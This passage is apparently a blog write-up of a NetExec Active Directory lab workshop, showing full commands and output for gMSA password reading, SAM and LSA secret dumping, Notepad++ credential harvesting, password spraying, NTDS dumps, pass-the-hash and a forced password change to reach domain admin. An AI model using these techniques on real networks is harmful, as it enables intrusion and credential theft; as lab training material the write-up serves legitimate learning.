LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.7        389    JEDHA            [+] rebels.local\ENDOR$:endor 
LDAP        10.0.0.7        389    JEDHA            [*] Getting GMSA Passwords
LDAP        10.0.0.7        389    JEDHA            Account: gMSA-scarif$         NTLM: 889c32ef466ff6b367cf8adf7fce539b     PrincipalsAllowedToReadPassword: ENDOR$

Surprisingly it works, but if we check the BloodHound post workshop it makes sense since endor has the ReadGMSAPassword over gMSA-scarif$ as shown below:

Credentials 🔑 - `gMSA-scarif$`

gMSA-scarif$:889c32ef466ff6b367cf8adf7fce539b

Enumeration as `gMSA-scarif$`

Time to start our enumeration again with this account:

BloodHound doesn’t show any interesting ACLs
Password spraying doesn’t yield any results
We do have READ access to the Destroyer_Access SMB share though on DANTOOINE:

nxc smb 10.0.0.8 -u 'gMSA-scarif$' -H 889c32ef466ff6b367cf8adf7fce539b --shares
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\gMSA-scarif$:889c32ef466ff6b367cf8adf7fce539b
SMB         10.0.0.8        445    DANTOOINE        [*] Enumerated shares
SMB         10.0.0.8        445    DANTOOINE        Share           Permissions     Remark
SMB         10.0.0.8        445    DANTOOINE        -----           -----------     ------
SMB         10.0.0.8        445    DANTOOINE        ADMIN$                          Remote Admin
SMB         10.0.0.8        445    DANTOOINE        C$                              Default share
SMB         10.0.0.8        445    DANTOOINE        D$                              Default share
SMB         10.0.0.8        445    DANTOOINE        Destroyer_Access READ
SMB         10.0.0.8        445    DANTOOINE        IPC$            READ            Remote IPC

Info

I tried to enumerate this directory earlier as droideka through the MSSQL link but we didn’t have the permissions.

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='powershell -c ls /Destroyer_Access'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: powershell -c ls /Destroyer_Access
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ls : Access to the path 'C:\Destroyer_Access' is denied.
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         At line:1 char:1
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + ls /Destroyer_Access
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + ~~~~~~~~~~~~~~~~~~~~
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + CategoryInfo          : PermissionDenied: (C:\Destroyer_Access:String) [Get-ChildItem], UnauthorizedAccessExcept
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ion
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR

Enumerating the `Destroyer_Access` share with `spider_plus`

We can enumerate and download the files with the spider_plus module:

nxc smb 10.0.0.8 -u 'gMSA-scarif$' -H 889c32ef466ff6b367cf8adf7fce539b -M spider_plus -o DOWNLOAD_FLAG=true
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\gMSA-scarif$:889c32ef466ff6b367cf8adf7fce539b
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]     STATS_FLAG: True
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.0.0.8        445    DANTOOINE        [*] Enumerated shares
SMB         10.0.0.8        445    DANTOOINE        Share           Permissions     Remark
SMB         10.0.0.8        445    DANTOOINE        -----           -----------     ------
SMB         10.0.0.8        445    DANTOOINE        ADMIN$                          Remote Admin
SMB         10.0.0.8        445    DANTOOINE        C$                              Default share
SMB         10.0.0.8        445    DANTOOINE        D$                              Default share
SMB         10.0.0.8        445    DANTOOINE        Destroyer_Access READ
SMB         10.0.0.8        445    DANTOOINE        IPC$            READ            Remote IPC
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.0.0.8.json".
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] SMB Shares:           5 (ADMIN$, C$, D$, Destroyer_Access, IPC$)
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] SMB Readable Shares:  2 (Destroyer_Access, IPC$)
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Total folders found:  0
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Total files found:    2
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File size average:    1.56 KB
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File size min:        86 B
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File size max:        3.04 KB
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File unique exts:     2 (txt, pfx)
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Downloads successful: 2
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [+] All files processed successfully.

There are 2 files:

ls -l /root/.nxc/modules/nxc_spider_plus/10.0.0.8/Destroyer_Access
info.txt  
poe.pfx

Here is the info.txt file:

Access key for the ship ! Also, stop taking note, it can be unsafe, you never know …

The “key for the ship” is referencing the PFX certificate. We can use the new PFX options that were implemented in a recent PR by @mpgn.

We have administrative access to DANTOOINE as poe, meaning we can dump the SAM database that contains the localadmin user:

nxc smb 10.0.0.8 -u 'poe' --pfx-cert loot/poe.pfx --sam                                                                                              
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\poe:15267fa2b302e8d98d13fb36d2dbbd64 (admin)
SMB         10.0.0.8        445    DANTOOINE        [*] Dumping SAM hashes
SMB         10.0.0.8        445    DANTOOINE        localadmin:500:aad3b435b51404eeaad3b435b51404ee:36fc6efd0c21742c771ec0bfd79757de:::
SMB         10.0.0.8        445    DANTOOINE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.0.8        445    DANTOOINE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.0.8        445    DANTOOINE        WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a674f72feb919a21239dc68880ffb55d:::
SMB         10.0.0.8        445    DANTOOINE        [+] Added 4 SAM hashes to the database

The info.txt also has a hint saying to “stop taking notes”, this made me think about checking several areas on the machine where people could have left notes:

PowerShell history
Recycle Bin
Notepad
Notepad++

Enumerating Notepad++ files

Info

The notepad++ module finds notepad++ unsaved backup files and lists their contents:

C:\Users\localadmin\AppData\Roaming\Notepad++\backup\new 1@2025-06-24_100732 contains some credentials:

nxc smb 10.0.0.8  -u 'localadmin' -H 36fc6efd0c21742c771ec0bfd79757de --local-auth -M notepad++
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:DANTOOINE) (signing:True) (SMBv1:False) 
SMB         10.0.0.8        445    DANTOOINE        [+] DANTOOINE\localadmin:36fc6efd0c21742c771ec0bfd79757de (admin)
NOTEPAD++   10.0.0.8        445    DANTOOINE        C:\Users\localadmin\AppData\Roaming\Notepad++\backup\new 1@2025-06-24_100732
NOTEPAD++   10.0.0.8        445    DANTOOINE            credentials
NOTEPAD++   10.0.0.8        445    DANTOOINE            - wz(}ab4=/&_f
NOTEPAD++   10.0.0.8        445    DANTOOINE            - s>cwp>9c*x=s
NOTEPAD++   10.0.0.8        445    DANTOOINE        Notepad++ backup written to: /root/.nxc/modules/notepad++/10.0.0.8_localadmin_notepad_backup_1.txt

Password Spraying 💦

Let’s spray them across the users and we get a hit with obiwan:

nxc smb targets.txt -u 'users/rebels.txt' -p users/passwords.txt --continue-on-success
SMB         10.0.0.7        445    jedha            [+] rebels.local\obiwan:wz(}ab4=/&_f

Credentials 🔑 - `obiwan`

obiwan:wz(}ab4=/&_f

Backup Operator

Another recent PR by @mpgn allows us to exploit the SeBackupPrivilege to dump the SAM, SYSTEM and SECURITY hives. Let’s try that out blindly as obiwan since I had a hunch:

nxc smb targets.txt -u 'obiwan' -p 'wz(}ab4=/&_f' -M backup_operator
SMB         10.0.0.6        445    MUSTAFAR         [*] Windows Server 2022 Build 20348 x64 (name:MUSTAFAR) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    jedha            [*] Windows Server 2022 Build 20348 x64 (name:jedha) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.6        445    MUSTAFAR         [-] empire.local\obiwan:wz(}ab4=/&_f STATUS_LOGON_FAILURE
SMB         10.0.0.5        445    coruscant        [-] empire.local\obiwan:wz(}ab4=/&_f STATUS_LOGON_FAILURE
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\obiwan:wz(}ab4=/&_f
BACKUP_O... 10.0.0.8        445    DANTOOINE        [*] Triggering RemoteRegistry to start through named pipe...
SMB         10.0.0.7        445    jedha            [+] rebels.local\obiwan:wz(}ab4=/&_f
BACKUP_O... 10.0.0.7        445    jedha            [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.0.0.8        445    DANTOOINE        [-] Couldn't save HKLM\SAM: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied  on path \\10.0.0.8\SYSVOL\SAM
BACKUP_O... 10.0.0.7        445    jedha            [-] Couldn't save HKLM\SAM: RRP SessionError: code: 0xb7 - ERROR_ALREADY_EXISTS - Cannot create a file when that file already exists. on path \\10.0.0.7\SYSVOL\SAM

Unfortunately I wasn’t the first person here 😓 so my dump didn’t work as the files already existed in SYSVOL:

I had to download the files that were already accessible on the SYSVOL share then extract the secrets with secretsdump (ok I didn’t use nxc for this part 😂).

Secretsdump

secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x0a68842a6bb2394984e82b607e3bf5e3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6db5eb0d52b4016139ea90b2f36a652d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:0ea26d2703cc231b11c6966908a847952e50af684ccf0ee3a990fc723ad40d8b29fbed4b7b6be5f28ac8145b5f61b52e9e7837a84d0c955a4a508e2177b6d6ed943565d4937c50ec695eb9a72b0e985b8c78359a2f406700fbdc04a8ff57a60fb85b0f4ec300ffae4fc186d101850ad16c73147742139edce9e6bd2b16f8f477d2d8c6f28d2b08934c15c440cf03b4f683c5cdc72fee58b7fca8496434e85fde374e8d77e58ed0b1607a03920489084736e5a4abbdea8c00846540d0a2d306b398d65e29a5609f0a0053bbd74e59a3bffb31857f241f21ee290e79ba6cb582735ae0f47f237d93899ed192cfeb5f2e4a
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:6818e41f26d213767204815c05cece26
[*] DefaultPassword 
(Unknown User):db_yLR8;W}pl
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x9526ee65d5e6780ce9ddd7a2826f358f43f8fde0
dpapi_userkey:0xe849f9292132952a94dcef6379b33b59be9bbc3c
[*] NL$KM 
 0000   BE 05 50 1C AA F8 5E E2  FC 24 03 63 8E 41 9F 86   ..P...^..$.c.A..
 0010   22 50 C2 DB 0F FB D1 C8  3B E5 68 E1 71 AA FF 4E   "P......;.h.q..N
 0020   FE FB 9A 8C B7 AD FF 49  2A BA 71 0B A1 72 68 8D   .......I*.q..rh.
 0030   B6 E9 70 DC C5 09 EA 45  46 79 0E 37 D1 B1 DE D9   ..p....EFy.7....
NL$KM:be05501caaf85ee2fc2403638e419f862250c2db0ffbd1c83be568e171aaff4efefb9a8cb7adff492aba710ba172688db6e970dcc509ea4546790e37d1b1ded9
[*] Cleaning up...

We get the administrator’s hash as well as a cleartext password (db_yLR8;W}pl) for an unknown user.

We can directly dump NTDS since we are domain administrator of the rebels.local domain:

nxc smb 10.0.0.7 -u 'administrator' -H '6db5eb0d52b4016139ea90b2f36a652d' --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y
SMB         10.0.0.7        445    jedha            [*] Windows Server 2022 Build 20348 x64 (name:jedha) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    jedha            [+] rebels.local\administrator:6db5eb0d52b4016139ea90b2f36a652d (admin)
SMB         10.0.0.7        445    jedha            [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.0.0.7        445    jedha            rebels.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:6db5eb0d52b4016139ea90b2f36a652d:::
SMB         10.0.0.7        445    jedha            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.0.7        445    jedha            krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8197f5b787e8ed87845d94cae97f9758:::
SMB         10.0.0.7        445    jedha            rebels.local\luke:1106:aad3b435b51404eeaad3b435b51404ee:98fc6b0578a8d209a834b20513fe1ba3:::
SMB         10.0.0.7        445    jedha            rebels.local\leia:1107:aad3b435b51404eeaad3b435b51404ee:34feb4df76020988f933d340c04c5868:::
SMB         10.0.0.7        445    jedha            rebels.local\han:1108:aad3b435b51404eeaad3b435b51404ee:fa159092f7dc6ae78ed6496e0cec5c0d:::
SMB         10.0.0.7        445    jedha            rebels.local\obiwan:1109:aad3b435b51404eeaad3b435b51404ee:f0057beb1194995b74c28becda1ad201:::
SMB         10.0.0.7        445    jedha            rebels.local\lando:1110:aad3b435b51404eeaad3b435b51404ee:c697c8e44fc55db5f0eeb0f1de1c47f7:::
SMB         10.0.0.7        445    jedha            rebels.local\jyn:1111:aad3b435b51404eeaad3b435b51404ee:4febb45b02ee6b653a73eac892c49952:::
SMB         10.0.0.7        445    jedha            rebels.local\cassian:1112:aad3b435b51404eeaad3b435b51404ee:734bd69e2739ff552aeb26535dc1ee4c:::
SMB         10.0.0.7        445    jedha            rebels.local\finn:1113:aad3b435b51404eeaad3b435b51404ee:6bf5bfe70e178247f3d433ce3d02fae4:::
SMB         10.0.0.7        445    jedha            rebels.local\rey:1114:aad3b435b51404eeaad3b435b51404ee:dd6a2b0a07e11f04518fb7470ba10bf9:::
SMB         10.0.0.7        445    jedha            rebels.local\maz:1115:aad3b435b51404eeaad3b435b51404ee:844bfaf9557153d4969c03156bd77f25:::
SMB         10.0.0.7        445    jedha            rebels.local\poe:1116:aad3b435b51404eeaad3b435b51404ee:15267fa2b302e8d98d13fb36d2dbbd64:::
SMB         10.0.0.7        445    jedha            rebels.local\wedge:1117:aad3b435b51404eeaad3b435b51404ee:c653673f3238e496371c8fa0884c9774:::
SMB         10.0.0.7        445    jedha            rebels.local\biggs:1118:aad3b435b51404eeaad3b435b51404ee:168b115abc1c2f2892936c0ea6728de8:::
SMB         10.0.0.7        445    jedha            rebels.local\mon:1119:aad3b435b51404eeaad3b435b51404ee:2e9de0b78541e3acece4806d5feb0e96:::
SMB         10.0.0.7        445    jedha            rebels.local\bodhi:1120:aad3b435b51404eeaad3b435b51404ee:9bcbf649c669e0f24cbcb1b5ed523985:::
SMB         10.0.0.7        445    jedha            rebels.local\chirrut:1121:aad3b435b51404eeaad3b435b51404ee:071d139ac3093f5e3e7ce49b52dc8de7:::
SMB         10.0.0.7        445    jedha            rebels.local\baze:1122:aad3b435b51404eeaad3b435b51404ee:db1c9344ff30724d47becf7ac8b35932:::
SMB         10.0.0.7        445    jedha            rebels.local\hera:1123:aad3b435b51404eeaad3b435b51404ee:6782429a2408c734148d6a4ba2cf100e:::
SMB         10.0.0.7        445    jedha            rebels.local\ezra:1124:aad3b435b51404eeaad3b435b51404ee:487475c54ff573d9d7235a6f7b9c96a2:::
SMB         10.0.0.7        445    jedha            rebels.local\sabine:1125:aad3b435b51404eeaad3b435b51404ee:94f9963f53b977b90caaf40f94203168:::
SMB         10.0.0.7        445    jedha            jedha$:1000:aad3b435b51404eeaad3b435b51404ee:6818e41f26d213767204815c05cece26:::
SMB         10.0.0.7        445    jedha            DANTOOINE$:1103:aad3b435b51404eeaad3b435b51404ee:2ede1c63b1a60dce4638bc925a4d77d1:::
SMB         10.0.0.7        445    jedha            ENDOR$:1104:aad3b435b51404eeaad3b435b51404ee:e43f63b3d680076ffd8dafaae8b642c1:::
SMB         10.0.0.7        445    jedha            gMSA-scarif$:1105:aad3b435b51404eeaad3b435b51404ee:889c32ef466ff6b367cf8adf7fce539b:::
SMB         10.0.0.7        445    jedha            [+] Dumped 27 NTDS hashes to /root/.nxc/logs/ntds/jedha_10.0.0.7_2025-06-29_003209.ntds of which 23 were added to the database

Let’s create a list of all the NT hashes above:

cat /root/.nxc/logs/ntds/jedha_10.0.0.7_2025-06-29_003209.ntds | grep -iv disabled | cut -d ':' -f4 > users/hashes.txt

Password Spraying on `empire.local` 💦

Then spray them on the other domain:

nxc smb scope/dc.txt -u users/all-users.txt -H users/hashes.txt
SMB         10.0.0.5        445    coruscant        [+] empire.local\fn2187:6bf5bfe70e178247f3d433ce3d02fae4

We get a hit with fn2187, as we saw earlier this account has a path to domain admin since he can change the password of vader:

Finally we can change vader’s password to get domain administrator of empire.local with the change-password module:

nxc smb 10.0.0.5 -u fn2187 -H 6bf5bfe70e178247f3d433ce3d02fae4 -M change-password -o USER=vader NEWPASS=potato123!
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [+] empire.local\fn2187:6bf5bfe70e178247f3d433ce3d02fae4
CHANGE-P... 10.0.0.5        445    coruscant        [+] Successfully changed password for vader

Then dump NTDS on empire.local to get the Domain Administrator’s NT hash:

nxc smb 10.0.0.5 -u vader -p potato123! --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [+] empire.local\vader:potato123!
SMB         10.0.0.5        445    coruscant        [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB         10.0.0.5        445    coruscant        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.0.0.5        445    coruscant        localadmin:500:aad3b435b51404eeaad3b435b51404ee:2ca98fe859493f43996323332531b51e:::

Thanks & Final Thoughts

Huge thanks to @mpgn_x64, @wil_fri3d and @_zblurx for organizing this workshop for yet another year. I’m pleased that I managed to complete both domains this year 😁!

Congratulations to @LeandreOnizuka for the first place 🏆 and wfrnds1 for the second place!

I ended up completing the lab in just under 5 hours as you can see from the timestamp below:

Hopefully I do better next year and maybe get a place on the podium 🤞 (and a seat in the workshop room if there is more space and plugs to charge my laptop 🤣. I ended up squatting the DGSE’s stand 😎)!

Nonetheless I learnt to use a bunch of different/new modules/flags that I had never tested before such as:

--nla-screenshot
--no-preauth-targets
-M enum_logins
-M link_xpcmd
-M backup_operator
-M change-password

As shown throughout this writeup NetExec is getting to a stage that it can be used “almost” exclusively (shoutout secretsdump 😆) to perform Active Directory pentesting. This is thanks to the massive work from all it’s awesome contributors.

If you have any ideas on cool modules that could be added or any quality of life changes go for it and make a PR. As an example here is a recent Recycle Bin PR that I developed (and still need to integrate with @Dfte’s module 😅) to enumerate and download files in the Recycle Bin. It really is a surprisingly easy development process and there are plenty of templates from other modules that you can use to get started.

I will be releasing a blog post soon on how to create your first NetExec module if you’re interested.

Hope you learnt something new and I look forward to hanging out next year and owning the domains even faster!

Table of Contents

Context

Discovery & Enumeration

Setup - /etc/hosts

RDP - (nla:False)

AS-REP Roasting & Kerberoasting (without pre-authentication)

Credentials 🔑 - krennic

Domain 1 - empire.local

MSSQL enumeration on MUSTAFAR